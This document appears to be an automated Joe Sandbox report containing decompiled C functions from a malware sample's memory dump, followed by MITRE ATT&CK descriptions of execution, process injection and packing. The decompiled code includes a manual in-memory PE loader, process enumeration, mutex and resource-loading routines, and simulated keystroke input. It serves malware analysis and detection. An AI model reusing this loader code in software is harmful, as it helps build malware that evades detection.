Memory Dump Source

Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd

Similarity

API ID: CloseErrorHandleLastThreadThread32$CreateFirstNextOpenSnapshotSuspendToolhelp32
String ID:
API String ID: 2698708724-0
Opcode ID: d00e0f1a5a065d98ea2226382c3ba1f3d9776f7e377732fd60ab602eb3a6c274
Instruction ID: c984cac7a99ecce17a928f8208aca285e63ef7db08bab2130a9f06108b457a29
Opcode Fuzzy Hash: d00e0f1a5a065d98ea2226382c3ba1f3d9776f7e377732fd60ab602eb3a6c274
Instruction Fuzzy Hash: 5B11C43E94021AABDB21ABA4CD45FEEB3B8AF48320F144111F901E6290D774DE458B71

Uniqueness

Uniqueness Score: -1.00%

Function 00D3250C, Relevance: 12.1, APIs: 8, Instructions: 57
filememoryCOMMON

C-Code - Quality: 100%

			E00D3250C(void* __ecx, long _a4, void** _a8, long* _a12) {
				struct _OVERLAPPED* _v8;
				long _t12;
				void* _t13;
				void* _t19;
				long* _t28;

				_v8 = 0;
				_t19 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0);
				if(_t19 == 0xffffffff) {
					GetLastError();
				} else {
					_t12 = GetFileSize(_t19, 0);
					_t28 = _a12;
					 *_t28 = _t12;
					_t13 = LocalAlloc(0x40, _t12);
					 *_a8 = _t13;
					if(_t13 == 0) {
						GetLastError();
						 *_t28 = 0;
					} else {
						_a4 = 0;
						if(ReadFile(_t19, _t13,  *_t28,  &_a4, 0) == 0) {
							GetLastError();
						} else {
							_v8 = 1;
						}
					}
					CloseHandle(_t19);
				}
				return _v8;
			}

0x00d32523
0x00d3252c
0x00d32531
0x00d3258c
0x00d32533
0x00d32536
0x00d3253c
0x00d32542
0x00d32544
0x00d3254d
0x00d32551
0x00d3257a
0x00d32580
0x00d32553
0x00d3255a
0x00d32567
0x00d32572
0x00d32569
0x00d32569
0x00d32569
0x00d32567
0x00d32583
0x00d32589
0x00d32598

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D32526
GetFileSize.KERNEL32(00000000,00000000,7622DAA3,?,?,00D31DD6,?,?,?,?,?), ref: 00D32536
LocalAlloc.KERNEL32(00000040,00000000,?,?,00D31DD6,?,?,?,?,?), ref: 00D32544
ReadFile.KERNEL32(00000000,00000000,00D31DD6,?,00000000), ref: 00D3255F
GetLastError.KERNEL32(?,?,00D31DD6,?,?,?,?,?), ref: 00D32572
GetLastError.KERNEL32(?,?,00D31DD6,?,?,?,?,?), ref: 00D3257A
CloseHandle.KERNEL32(00000000), ref: 00D32583
GetLastError.KERNEL32(?,?,00D31DD6,?,?,?,?,?), ref: 00D3258C

Memory Dump Source

Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd

Similarity

API ID: ErrorFileLast$AllocCloseCreateHandleLocalReadSize
String ID:
API String ID: 541326989-0
Opcode ID: 9558574aae6c60e8ba8450b64c7f85d30d898653676be1d91e841d968fcf77c8
Instruction ID: b483551a5ae16dab9bb07ff5fd56bdc185f0f87c8ba8065b0754336e0692579b
Opcode Fuzzy Hash: 9558574aae6c60e8ba8450b64c7f85d30d898653676be1d91e841d968fcf77c8
Instruction Fuzzy Hash: 2C1139B8A00346FFD7245F65DC5CEAB7FBCEB99751F204508BA42D6250D6B19A80CA30

Uniqueness

Uniqueness Score: -1.00%

Function 00D32822, Relevance: 9.0, APIs: 6, Instructions: 41
processCOMMON

C-Code - Quality: 100%

			E00D32822(intOrPtr _a4) {
				intOrPtr _v276;
				intOrPtr _v292;
				void* _v300;
				int _t17;
				void* _t18;

				_t17 = 0;
				_t18 = CreateToolhelp32Snapshot(2, 0);
				if(_t18 == 0xffffffff) {
					GetLastError();
				} else {
					_v300 = 0x128;
					if(Process32First(_t18,  &_v300) == 0) {
						GetLastError();
					} else {
						while(_v292 != _a4) {
							if(Process32Next(_t18,  &_v300) != 0) {
								continue;
							} else {
							}
							goto L7;
						}
						_t17 = _v276;
					}
					L7:
					CloseHandle(_t18);
				}
				return _t17;
			}

0x00d3282d
0x00d32837
0x00d3283c
0x00d3288e
0x00d3283e
0x00d32846
0x00d32857
0x00d3287f
0x00d32859
0x00d32859
0x00d32873
0x00000000
0x00000000
0x00d32875
0x00000000
0x00d32873
0x00d32877
0x00d32877
0x00d32885
0x00d32886
0x00d32886
0x00d32899

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D32832
Process32First.KERNEL32(00000000,?), ref: 00D32850
Process32Next.KERNEL32(00000000,00000128), ref: 00D3286C
GetLastError.KERNEL32(00000000,7622D965), ref: 00D3287F
CloseHandle.KERNEL32(00000000), ref: 00D32886
GetLastError.KERNEL32(00000000,7622D965), ref: 00D3288E

Memory Dump Source

Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd

Similarity

API ID: ErrorLastProcess32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 3005108968-0
Opcode ID: b624bff7209880cc44c9ef2c8dd97ea14190ff6bc5d60bfb3d1ed16efd26155c
Instruction ID: 93857da8559719af2fc656bcd91145c74b100c7de9e7bb249f62d34997b08544
Opcode Fuzzy Hash: b624bff7209880cc44c9ef2c8dd97ea14190ff6bc5d60bfb3d1ed16efd26155c
Instruction Fuzzy Hash: 81F0F636E01225ABD724AB698C09EFE7B7CEF88361F040160F955D2180DB34DE95CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D324AA, Relevance: 9.0, APIs: 6, Instructions: 40
fileCOMMON

C-Code - Quality: 100%

			E00D324AA(long _a4, void* _a8, long _a12) {
				void* _t14;
				struct _OVERLAPPED* _t15;

				_t15 = 0;
				_t14 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0, 0);
				if(_t14 == 0xffffffff) {
					GetLastError();
				} else {
					_a4 = 0;
					if(WriteFile(_t14, _a8, _a12,  &_a4, 0) == 0) {
						GetLastError();
					} else {
						_t15 = 1;
					}
					FlushFileBuffers(_t14);
					CloseHandle(_t14);
				}
				return _t15;
			}

0x00d324af
0x00d324c5
0x00d324ca
0x00d324fe
0x00d324cc
0x00d324d4
0x00d324e3
0x00d324e8
0x00d324e5
0x00d324e5
0x00d324e5
0x00d324ef
0x00d324f6
0x00d324f6
0x00d32509

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00D324BF
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00D324DB
GetLastError.KERNEL32(?,00D3337A,?,?,?,?,?,?,00D31E68,?,?,?,?), ref: 00D324E8
FlushFileBuffers.KERNEL32(00000000), ref: 00D324EF
CloseHandle.KERNEL32(00000000), ref: 00D324F6
GetLastError.KERNEL32(?,00D3337A,?,?,?,?,?,?,00D31E68,?,?,?,?), ref: 00D324FE

Memory Dump Source

Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd

Similarity

API ID: File$ErrorLast$BuffersCloseCreateFlushHandleWrite
String ID:
API String ID: 3976640885-0
Opcode ID: 52dc81c44de24fc20751ecf245aac598e3708ffbbadedf96d4171974542e102c
Instruction ID: 983b5a8c72a6151183f4f0b84a412df922dc32bbe111943ae6333cce0e3f40db
Opcode Fuzzy Hash: 52dc81c44de24fc20751ecf245aac598e3708ffbbadedf96d4171974542e102c
Instruction Fuzzy Hash: 23F0F93A601226BBD7251F66EC4CEFF7E2CEB567B2B148015FA0AC1260C7308551D6F0

Uniqueness

Uniqueness Score: -1.00%

Function 00D31434, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
COMMON

C-Code - Quality: 75%

			E00D31434(void* __eflags) {
				void* _t6;

				__imp__#680();
				_t6 = E00D32291(__eflags);
				if(_t6 != 0) {
					if(GetLastError() != 0xb7) {
						E00D313D0("CLIENT32");
					}
					CloseHandle(_t6);
				}
				return 0;
			}

0x00d31435
0x00d31440
0x00d31444
0x00d31451
0x00d31458
0x00d31458
0x00d3145e
0x00d3145e
0x00d31466

APIs

IsUserAnAdmin.SHELL32 ref: 00D31435

Part of subcall function 00D32291: _memset.LIBCMT ref: 00D322A1
Part of subcall function 00D32291: CreateMutexA.KERNELBASE(7622DAA3,00000000,Global\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A},7622DAA3,001F0001,?,?,00000000,7622DAA3,00D3232C,00000000), ref: 00D322C5
Part of subcall function 00D32291: GetLastError.KERNEL32(?,?,00000000,7622DAA3,00D3232C,00000000), ref: 00D322D1

GetLastError.KERNEL32(?,?), ref: 00D31446
CloseHandle.KERNEL32(00000000), ref: 00D3145E

Part of subcall function 00D313D0: FindResourceA.KERNEL32(00000000,00D3145D,0000000A), ref: 00D313D8
Part of subcall function 00D313D0: LoadResource.KERNEL32(00000000,00000000,?,?), ref: 00D313E5
Part of subcall function 00D313D0: LockResource.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00D313F3

Strings

CLIENT32, xrefs: 00D31453

Memory Dump Source

Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd

Similarity

API ID: Resource$ErrorLast$AdminCloseCreateFindHandleLoadLockMutexUser_memset
String ID: CLIENT32
API String ID: 2587862435-3575452709
Opcode ID: 48b58c5e3f7b6bcf8dfce80ba967adb0b269f3a6f466cacbf9f9f0c6e95f48a6
Instruction ID: 2e4f45d10baf73aa5a05b32ee1dcf0707059ad03215f9a8f6a10bec5f7078a0e
Opcode Fuzzy Hash: 48b58c5e3f7b6bcf8dfce80ba967adb0b269f3a6f466cacbf9f9f0c6e95f48a6
Instruction Fuzzy Hash: B0D0123DD067234A935133757C095DE2250DF51B91F090520F904E1A11DB848C8301FA

Uniqueness

Uniqueness Score: -1.00%

Function 00D32062, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

C-Code - Quality: 100%

			E00D32062() {
				void* _t1;
				_Unknown_base(*)()* _t3;

				if( *0xd359f4 == 0) {
					_t3 = GetProcAddress(LoadLibraryA("user32.dll"), "wvsprintfA");
					 *0xd359f4 = _t3;
					return _t3;
				}
				return _t1;
			}

0x00d32069
0x00d3207c
0x00d32082
0x00000000
0x00d32082
0x00d32087

APIs

LoadLibraryA.KERNEL32(user32.dll), ref: 00D32075
GetProcAddress.KERNEL32(00000000), ref: 00D3207C

Strings

wvsprintfA, xrefs: 00D3206B
user32.dll, xrefs: 00D32070

Memory Dump Source

Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: user32.dll$wvsprintfA
API String ID: 2574300362-1331095676
Opcode ID: 603b3d6787676b9b5fc06d423124ff9e68be9da43f383e20c1e8cb839bad907f
Instruction ID: 132ae66bd9ec2b6b944c9e7d1bc9c5e94a9aca8d68a120a0de38c5c459e5e943
Opcode Fuzzy Hash: 603b3d6787676b9b5fc06d423124ff9e68be9da43f383e20c1e8cb839bad907f
Instruction Fuzzy Hash: 6EC012BE806343DEC7081B60AE0ABA13AA0A340712F000204A201C0268D7B004488B30

Uniqueness

Uniqueness Score: -1.00%

Function 00D32088, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

C-Code - Quality: 100%

			E00D32088() {
				void* _t1;
				_Unknown_base(*)()* _t3;

				if( *0xd359f8 == 0) {
					_t3 = GetProcAddress(LoadLibraryA("msvcrt.dll"), "_vscprintf");
					 *0xd359f8 = _t3;
					return _t3;
				}
				return _t1;
			}

0x00d3208f
0x00d320a2
0x00d320a8
0x00000000
0x00d320a8
0x00d320ad

APIs

LoadLibraryA.KERNEL32(msvcrt.dll), ref: 00D3209B
GetProcAddress.KERNEL32(00000000), ref: 00D320A2

Strings

msvcrt.dll, xrefs: 00D32096
_vscprintf, xrefs: 00D32091

Memory Dump Source

Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: _vscprintf$msvcrt.dll
API String ID: 2574300362-514782248
Opcode ID: 518752c880001793b1b9114d55ef18f10c3cb971d4bc0b4c280161096e2e3127
Instruction ID: debfb4d0afc444c24fb6e70794adec464b7feb66f261efa0adc45e43a1079d29
Opcode Fuzzy Hash: 518752c880001793b1b9114d55ef18f10c3cb971d4bc0b4c280161096e2e3127
Instruction Fuzzy Hash: EFC012FE802303DFC7480BA0AC0ABA03A60A300312F040084A620D0268D6B000888A30

Uniqueness

Uniqueness Score: -1.00%

Function 00D3203C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

C-Code - Quality: 100%

			E00D3203C() {
				void* _t1;
				_Unknown_base(*)()* _t3;

				if( *0xd359f0 == 0) {
					_t3 = GetProcAddress(LoadLibraryA("user32.dll"), "wsprintfA");
					 *0xd359f0 = _t3;
					return _t3;
				}
				return _t1;
			}

0x00d32043
0x00d32056
0x00d3205c
0x00000000
0x00d3205c
0x00d32061

APIs

LoadLibraryA.KERNEL32(user32.dll), ref: 00D3204F
GetProcAddress.KERNEL32(00000000), ref: 00D32056

Strings

wsprintfA, xrefs: 00D32045
user32.dll, xrefs: 00D3204A

Memory Dump Source

Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: user32.dll$wsprintfA
API String ID: 2574300362-4095251970
Opcode ID: 7eff6ad78efe5f969c6b9ea5a512e1b459f893422179cb3616bbe088f079f6f1
Instruction ID: dce2c82c6579ed927810483bc9110cabc1a0ba473d82c0c77591d82145747ed9
Opcode Fuzzy Hash: 7eff6ad78efe5f969c6b9ea5a512e1b459f893422179cb3616bbe088f079f6f1
Instruction Fuzzy Hash: 6DC04CBE941743DFCB185B60FD0EB9536A8B704753F454254B652D1368D7B40088DE74

Uniqueness

Uniqueness Score: -1.00%

Function 00D31903, Relevance: 6.1, APIs: 4, Instructions: 98
libraryloaderCOMMON

C-Code - Quality: 100%

			E00D31903(signed int* __ecx, signed int* _a4) {
				intOrPtr* _v8;
				signed int _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _t40;
				intOrPtr _t43;
				struct HINSTANCE__* _t45;
				intOrPtr _t48;
				intOrPtr _t49;
				signed int _t50;
				CHAR* _t55;
				_Unknown_base(*)()* _t56;
				intOrPtr _t59;
				signed int* _t60;
				intOrPtr* _t64;
				void* _t67;
				intOrPtr* _t69;
				signed int* _t71;
				signed int _t79;

				_t60 = __ecx;
				_t64 = _a4;
				_t40 =  *_t64;
				_t59 =  *((intOrPtr*)(_t64 + 4));
				_v12 = 1;
				if( *((intOrPtr*)(_t40 + 0x84)) > 0) {
					_t67 =  *((intOrPtr*)(_t40 + 0x80)) + _t59;
					if(IsBadReadPtr(_t67, 0x14) == 0) {
						_t69 = _t67 + 0x10;
						_v8 = _t69;
						while(1) {
							_t43 =  *((intOrPtr*)(_t69 - 4));
							if(_t43 == 0) {
								goto L23;
							}
							_t45 = LoadLibraryA(_t43 + _t59);
							_v16 = _t45;
							if(_t45 == 0xffffffff) {
								L22:
								_v12 = _v12 & 0x00000000;
							} else {
								_t48 = E00D31509(_t60,  *((intOrPtr*)(_t64 + 8)), 4 +  *(_t64 + 0xc) * 4);
								 *((intOrPtr*)(_t64 + 8)) = _t48;
								if(_t48 == 0) {
									goto L22;
								} else {
									 *((intOrPtr*)(_t48 +  *(_t64 + 0xc) * 4)) = _v16;
									 *(_t64 + 0xc) =  *(_t64 + 0xc) + 1;
									_t49 =  *((intOrPtr*)(_t69 - 0x10));
									if(_t49 == 0) {
										_t71 =  *_t69 + _t59;
										_t60 = _t71;
									} else {
										_t71 = _t49 + _t59;
										_t60 =  *_v8 + _t59;
									}
									_t50 =  *_t71;
									if(_t50 != 0) {
										_a4 = _t60;
										_a4 = _a4 - _t71;
										_t79 = _t50;
										L12:
										L12:
										if(_t79 >= 0) {
											_t55 = _t50 + _t59 + 2;
										} else {
											_t55 = _t50 & 0x0000ffff;
										}
										_t56 = GetProcAddress(_v16, _t55);
										_t60 = _a4;
										 *(_t60 + _t71) = _t56;
										if( *(_t60 + _t71) == 0) {
											goto L18;
										}
										_t71 =  &(_t71[1]);
										_t50 =  *_t71;
										if(_t50 != 0) {
											goto L12;
										} else {
										}
										goto L19;
										L18:
										_v12 = _v12 & 0x00000000;
									}
									L19:
									if(_v12 != 0) {
										_v8 = _v8 + 0x14;
										if(IsBadReadPtr(_v8 + 0xfffffff0, 0x14) == 0) {
											_t69 = _v8;
											continue;
										} else {
										}
									}
								}
							}
							goto L23;
						}
					}
					L23:
				}
				return _v12;
			}

0x00d31903
0x00d3190b
0x00d3190e
0x00d31917
0x00d3191a
0x00d31921
0x00d31930
0x00d3193b
0x00d31941
0x00d31944
0x00d3194c
0x00d3194c
0x00d31951
0x00000000
0x00000000
0x00d3195a
0x00d31960
0x00d31966
0x00d31a15
0x00d31a15
0x00d3196c
0x00d3197a
0x00d3197f
0x00d31984
0x00000000
0x00d3198a
0x00d31990
0x00d31993
0x00d31996
0x00d3199b
0x00d319ab
0x00d319ad
0x00d3199d
0x00d3199d
0x00d319a5
0x00d319a5
0x00d319af
0x00d319b3
0x00d319b5
0x00d319b8
0x00d319bb
0x00000000
0x00d319bd
0x00d319bd
0x00d319c8
0x00d319bf
0x00d319bf
0x00d319bf
0x00d319cf
0x00d319d5
0x00d319d8
0x00d319e1
0x00000000
0x00000000
0x00d319e3
0x00d319e6
0x00d319ea
0x00000000
0x00000000
0x00d319ec
0x00000000
0x00d319ee
0x00d319ee
0x00d319ee
0x00d319f2
0x00d319f6
0x00d319f8
0x00d31a0d
0x00d31949
0x00000000
0x00000000
0x00d31a13
0x00d31a0d
0x00d319f6
0x00d31984
0x00000000
0x00d31966
0x00d3194c
0x00d31a19
0x00d31a19
0x00d31a20

APIs

IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?), ref: 00D31933
LoadLibraryA.KERNEL32(?), ref: 00D3195A
GetProcAddress.KERNEL32(?,00000012,?,?), ref: 00D319CF
IsBadReadPtr.KERNEL32(-000000DC,00000014,?,?), ref: 00D31A05

Memory Dump Source

Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd

Similarity

API ID: Read$AddressLibraryLoadProc
String ID:
API String ID: 2438460464-0
Opcode ID: 33831874a2ca8202d181920f269f4385b7a265239a5b7bff103a2dff16f1a0aa
Instruction ID: 60f313fb160122449a44e2c4eb5997c8067082b8ebc47121da3ca67be3b7a7d0
Opcode Fuzzy Hash: 33831874a2ca8202d181920f269f4385b7a265239a5b7bff103a2dff16f1a0aa
Instruction Fuzzy Hash: DB31477AA00216EFDB10CF59C884BA9B7B8BF04355F288169E855E7390E770ED45CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D330CD, Relevance: 6.1, APIs: 4, Instructions: 54keyboardCOMMON

APIs

SendInput.USER32(00000001,?,0000001C), ref: 00D330FF
SendInput.USER32(00000001,?,0000001C), ref: 00D33114
SendInput.USER32(00000001,?,0000001C), ref: 00D33127
SendInput.USER32(00000001,?,0000001C), ref: 00D3313A

Memory Dump Source

Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd

Similarity

API ID: InputSend
String ID:
API String ID: 3431551938-0
Opcode ID: 371a8a03efb92ec4790588972d0160a30d49319f4951e29619d6a9872b020d29
Instruction ID: 89f04844674382fae49dbdaed4fe38749903cfbf438ed6644698712a5d46396d
Opcode Fuzzy Hash: 371a8a03efb92ec4790588972d0160a30d49319f4951e29619d6a9872b020d29
Instruction Fuzzy Hash: 0601BA71D5021DA9EB00DFA59C41BFFFBBCEF55710F10501BA604E6190D2B45A418BE5

Uniqueness

Uniqueness Score: -1.00%

Function 00D31A94, Relevance: 5.1, APIs: 4, Instructions: 130
memoryCOMMON

C-Code - Quality: 62%

			E00D31A94(void* __edi, signed short* _a4) {
				void* _v8;
				signed short* _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				signed int* _v32;
				intOrPtr* _v36;
				signed int* _t129;
				intOrPtr _t131;
				void* _t132;

				_t132 = __edi;
				_v12 = _a4;
				if(( *_v12 & 0x0000ffff) == 0x5a4d) {
					_v36 = _a4 + _v12[0x1e];
					if( *_v36 == 0x4550) {
						_v16 = VirtualAlloc( *(_v36 + 0x34),  *(_v36 + 0x50), 0x2000, 4);
						if(_v16 == 0) {
							_v16 = VirtualAlloc(0,  *(_v36 + 0x50), 0x2000, 4);
						}
						if(_v16 != 0) {
							_v28 = E00D314F3(0x14);
							 *((intOrPtr*)(_v28 + 4)) = _v16;
							 *(_v28 + 0xc) =  *(_v28 + 0xc) & 0x00000000;
							 *(_v28 + 8) =  *(_v28 + 8) & 0x00000000;
							 *(_v28 + 0x10) =  *(_v28 + 0x10) & 0x00000000;
							VirtualAlloc(_v16,  *(_v36 + 0x50), 0x1000, 4);
							_v8 = VirtualAlloc(_v16,  *(_v36 + 0x54), 0x1000, 4);
							_push(_v12[0x1e] +  *(_v36 + 0x54));
							_push(_v12);
							_push(_v8);
							E00D31489();
							 *_v28 = _v8 + _v12[0x1e];
							 *((intOrPtr*)( *_v28 + 0x34)) = _v16;
							E00D3171C(_a4, _v36, _v28);
							_t129 = _v16 -  *(_v36 + 0x34);
							_v32 = _t129;
							if(_t129 != 0) {
								E00D31884(_v28, _v32);
							}
							if(E00D31903(_t129, _v28) != 0) {
								E00D317BF(_t129, _v28);
								if( *((intOrPtr*)( *_v28 + 0x28)) == 0) {
									L18:
									return _v28;
								}
								_t131 = _v16 +  *((intOrPtr*)( *_v28 + 0x28));
								_v24 = _t131;
								if(_t131 != 0) {
									_v20 = _v24(_v16, 1, 0);
									if(_v20 != 0) {
										 *(_v28 + 0x10) = 1;
										goto L18;
									}
									goto L19;
								}
								goto L19;
							} else {
								L19:
								E00D31A23(_t132, _v28);
								return 0;
							}
						} else {
							return 0;
						}
					}
					return 0;
				}
				return 0;
			}

0x00d31a94
0x00d31a9d
0x00d31aab
0x00d31abd
0x00d31ac9
0x00d31aeb
0x00d31af2
0x00d31b09
0x00d31b09
0x00d31b10
0x00d31b20
0x00d31b29
0x00d31b2f
0x00d31b36
0x00d31b3d
0x00d31b51
0x00d31b6d
0x00d31b7c
0x00d31b7d
0x00d31b80
0x00d31b83
0x00d31b94
0x00d31b9e
0x00d31baa
0x00d31bb5
0x00d31bb8
0x00d31bbb
0x00d31bc3
0x00d31bc3
0x00d31bd2
0x00d31bdb
0x00d31be9
0x00d31c20
0x00000000
0x00d31c20
0x00d31bf3
0x00d31bf6
0x00d31bf9
0x00d31c09
0x00d31c10
0x00d31c19
0x00000000
0x00d31c19
0x00000000
0x00d31c12
0x00000000
0x00d31bd4
0x00d31c25
0x00d31c28
0x00000000
0x00d31c2d
0x00d31b12
0x00000000
0x00d31b12
0x00d31b10
0x00000000
0x00d31acb
0x00000000

APIs

VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,?,?,00D31426,00000000,?,00000000,?,?,?), ref: 00D31AE5
VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,?,?,00D31426,00000000), ref: 00D31B03

Part of subcall function 00D314F3: VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004,00D31408,?,?,?), ref: 00D31500

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,00000014,?,?,?,00D31426,00000000), ref: 00D31B51
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,00D31426,00000000), ref: 00D31B67

Part of subcall function 00D3171C: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,00000000,00000000,?,00000000), ref: 00D3176D
Part of subcall function 00D3171C: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,00000000,00000000,?,00000000), ref: 00D3178A

Part of subcall function 00D31903: IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?), ref: 00D31933
Part of subcall function 00D31903: LoadLibraryA.KERNEL32(?), ref: 00D3195A
Part of subcall function 00D31903: GetProcAddress.KERNEL32(?,00000012,?,?), ref: 00D319CF
Part of subcall function 00D31903: IsBadReadPtr.KERNEL32(-000000DC,00000014,?,?), ref: 00D31A05

Part of subcall function 00D317BF: VirtualFree.KERNEL32(?,?,00004000,?,00000000,00000000,?,?,?,00D31BE0,?,?,00000000,?,?,?), ref: 00D3180F
Part of subcall function 00D317BF: VirtualProtect.KERNEL32(?,?,?,00000000,?,00000000,00000000,?,?,?,00D31BE0,?,?,00000000,?,?), ref: 00D3185B

Part of subcall function 00D31A23: FreeLibrary.KERNEL32(?,?,00000000,00000000,00D31C2D,?,?,?,?,00D31426), ref: 00D31A60
Part of subcall function 00D31A23: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000000,00D31C2D,?,?,?,?,00D31426), ref: 00D31A83

Memory Dump Source

Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd

Similarity

API ID: Virtual$Alloc$Free$LibraryRead$AddressLoadProcProtect
String ID:
API String ID: 4109881786-0
Opcode ID: d84faa41cb39c09d247b2410976774e02c42f2e3a98f26450348123d5874c21c
Instruction ID: 0e09529365e91bffa2aeadf0dd99e331c5f27be522d310cb66a520937b964c26
Opcode Fuzzy Hash: d84faa41cb39c09d247b2410976774e02c42f2e3a98f26450348123d5874c21c
Instruction Fuzzy Hash: 5351C279A0020AEFDF05DF94C986FAEBBB1FF08315F045099E601AB2A1D3759990DF60

Uniqueness

Uniqueness Score: -1.00%

Description:	Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. One example command-line interface on Windows systems is cmd , which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. Scheduled Task ).
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process Monitoring, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory.
